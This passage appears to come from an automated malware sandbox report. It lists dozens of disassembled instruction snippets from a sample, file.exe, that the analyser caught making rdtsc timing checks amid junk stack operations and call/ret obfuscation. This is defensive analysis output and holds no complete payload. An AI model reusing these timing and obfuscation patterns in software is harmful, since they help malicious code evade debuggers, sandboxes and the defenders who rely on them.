Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50347D second address: 5034B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FB438CB0BFFh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jnp 00007FB438CB0C03h 0x00000017 jmp 00007FB438CB0BFDh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5034B4 second address: 5034B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5034B9 second address: 5034CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438CB0C01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5034CE second address: 5034D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5034D2 second address: 503544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edi, 0269625Ah 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 or dword ptr [ebp+122D2860h], edi 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FB438CB0BF8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 push edi 0x00000035 or ecx, dword ptr [ebp+122D1F6Ch] 0x0000003b pop edx 0x0000003c jnl 00007FB438CB0BFCh 0x00000042 call 00007FB438CB0BF9h 0x00000047 jmp 00007FB438CB0C01h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jnl 00007FB438CB0BF8h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 503544 second address: 503565 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB438C6F733h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 503565 second address: 5035A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FB438CB0C00h 0x00000012 jmp 00007FB438CB0BFFh 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5035A2 second address: 503609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB438C6F726h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jmp 00007FB438C6F735h 0x00000016 jmp 00007FB438C6F72Bh 0x0000001b popad 0x0000001c pop eax 0x0000001d add ecx, dword ptr [ebp+122D28BDh] 0x00000023 lea ebx, dword ptr [ebp+12455104h] 0x00000029 mov edi, dword ptr [ebp+122D17EDh] 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 push ebx 0x00000032 pushad 0x00000033 popad 0x00000034 pop ebx 0x00000035 push ebx 0x00000036 pushad 0x00000037 popad 0x00000038 pop ebx 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c jmp 00007FB438C6F730h 0x00000041 pushad 0x00000042 push ecx 0x00000043 pop ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5036E8 second address: 50371F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FB438CB0C09h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007FB438CB0BFFh 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50371F second address: 5037EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F733h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FB438C6F738h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 js 00007FB438C6F738h 0x0000001b jmp 00007FB438C6F732h 0x00000020 jno 00007FB438C6F728h 0x00000026 popad 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007FB438C6F728h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 jmp 00007FB438C6F732h 0x00000047 push 00000003h 0x00000049 push 00000000h 0x0000004b pushad 0x0000004c mov esi, dword ptr [ebp+122D290Dh] 0x00000052 mov si, ax 0x00000055 popad 0x00000056 push 00000003h 0x00000058 adc ecx, 041CC1FAh 0x0000005e call 00007FB438C6F729h 0x00000063 jnc 00007FB438C6F734h 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FB438C6F72Ah 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5037EF second address: 5037F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5037F9 second address: 5037FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5037FD second address: 50384A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jnp 00007FB438CB0C0Eh 0x00000012 jns 00007FB438CB0BFCh 0x00000018 jp 00007FB438CB0BF6h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FB438CB0C00h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50384A second address: 50389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jl 00007FB438C6F73Bh 0x00000010 pop eax 0x00000011 xor edi, dword ptr [ebp+122D2A21h] 0x00000017 lea ebx, dword ptr [ebp+1245510Fh] 0x0000001d xor ch, FFFFFFA6h 0x00000020 push eax 0x00000021 pushad 0x00000022 jno 00007FB438C6F72Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB438C6F730h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5169FC second address: 516A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007FB438CB0BF6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516A11 second address: 516A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F734h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524065 second address: 52406B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52406B second address: 52406F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52406F second address: 524098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C05h 0x00000007 jo 00007FB438CB0BF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521EE5 second address: 521F20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FB438C6F72Ah 0x0000000a pop edi 0x0000000b jmp 00007FB438C6F734h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB438C6F732h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522065 second address: 522093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438CB0C09h 0x00000009 ja 00007FB438CB0BF6h 0x0000000f popad 0x00000010 jmp 00007FB438CB0BFAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5224EB second address: 522513 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FB438C6F72Dh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522E7A second address: 522EA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB438CB0C04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB438CB0C05h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0824 second address: 4F082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F082A second address: 4F0830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0830 second address: 4F0835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52319F second address: 5231F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C02h 0x00000007 jmp 00007FB438CB0C04h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007FB438CB0BF6h 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a popad 0x0000001b ja 00007FB438CB0C24h 0x00000021 pushad 0x00000022 jmp 00007FB438CB0BFEh 0x00000027 push esi 0x00000028 pop esi 0x00000029 jns 00007FB438CB0BF6h 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5231F8 second address: 5231FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5231FE second address: 523202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5237A7 second address: 5237AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5237AD second address: 5237B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5237B1 second address: 5237E3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB438C6F726h 0x00000008 jmp 00007FB438C6F730h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB438C6F736h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5237E3 second address: 5237E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523915 second address: 523919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523919 second address: 52392A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB438CB0BFBh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52392A second address: 523959 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F72Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FB438C6F726h 0x0000000f jmp 00007FB438C6F737h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523EAF second address: 523EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FB438CB0C02h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523EC8 second address: 523F07 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB438C6F737h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB438C6F731h 0x00000012 jmp 00007FB438C6F72Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523F07 second address: 523F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529649 second address: 52964E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52964E second address: 529694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB438CB0BF6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f js 00007FB438CB0C08h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007FB438CB0BFFh 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 jne 00007FB438CB0BF6h 0x00000029 pop esi 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529694 second address: 52969A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5302B5 second address: 5302BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53085F second address: 530887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB438C6F737h 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FB438C6F726h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5339C4 second address: 5339CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5339CA second address: 5339F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F737h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340C7 second address: 5340DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340DD second address: 5340F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F72Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340F0 second address: 534110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534574 second address: 53457A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534B37 second address: 534BA0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB438CB0BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007FB438CB0C0Dh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FB438CB0BF8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f jmp 00007FB438CB0C03h 0x00000034 push eax 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 js 00007FB438CB0BF6h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534BA0 second address: 534BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53519A second address: 5351C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB438CB0BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007FB438CB0C01h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5351C1 second address: 5351C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537BA1 second address: 537BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53819A second address: 5381A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB438C6F726h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538D24 second address: 538D77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sbb si, CA0Eh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FB438CB0BF8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1989h], eax 0x00000032 push 00000000h 0x00000034 sub di, D0C7h 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b pushad 0x0000003c js 00007FB438CB0BF6h 0x00000042 jns 00007FB438CB0BF6h 0x00000048 popad 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538AD0 second address: 538AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539807 second address: 53980B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A393 second address: 53A398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B61C second address: 53B634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438CB0C04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C06C second address: 53C076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB438C6F726h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F2BC second address: 53F2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F2C0 second address: 53F2C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F2C5 second address: 53F2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB438CB0C04h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F2E4 second address: 53F33E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edi 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FB438C6F728h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 clc 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FB438C6F728h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 push 00000000h 0x00000045 mov edi, 08ABF730h 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F33E second address: 53F344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5404EF second address: 5404F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F545 second address: 53F549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5415D4 second address: 5415E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F72Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5442AB second address: 5442BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5442BA second address: 5442C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5442C0 second address: 5442C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5442C4 second address: 544332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jnl 00007FB438C6F738h 0x00000010 pop edi 0x00000011 nop 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D1929h], ebx 0x00000019 mov ebx, dword ptr [ebp+122D1A7Ch] 0x0000001f popad 0x00000020 push 00000000h 0x00000022 jmp 00007FB438C6F72Ah 0x00000027 push 00000000h 0x00000029 call 00007FB438C6F735h 0x0000002e mov dword ptr [ebp+1245D1C4h], esi 0x00000034 pop ebx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 jmp 00007FB438C6F72Dh 0x0000003e pop eax 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5452B0 second address: 5452B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5452B6 second address: 5452BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5444BF second address: 5444FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FB438CB0C08h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5444FA second address: 5444FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
